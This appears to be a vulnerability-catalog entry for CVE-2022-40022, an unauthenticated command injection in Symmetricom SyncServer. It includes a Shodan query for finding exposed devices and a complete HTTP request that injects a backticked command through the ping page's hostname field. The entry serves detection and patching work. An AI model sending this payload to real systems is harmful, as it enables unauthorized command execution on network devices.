🔙 목록으로 돌아가기

CVE-2022-40022: Symmetricom SyncServer Unauthenticated - Remote Command Execution

TitleSymmetricom SyncServer Unauthenticated - Remote Command Execution
AuthorDhiyaneshDK,mielverkerken
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device.
RemediationApply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.90838
CVE IDCVE-2022-40022
CWE IDCWE-77
Shodan Queryhtml:"Symmetricom SyncServer"
Tags cve cve2022 packetstorm syncserver rce unauth microchip vkev vuln

🔍 Vulnerability Description

Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.

🌐 HTTP Request

POST /controller/ping.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Content-Length: 140
Content-Type: application/x-www-form-urlencoded
Origin: /
Referer: //controller/ping.php
Accept-Encoding: gzip

currentTab=ping&refreshMode=&ethDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-40022.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-40022.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A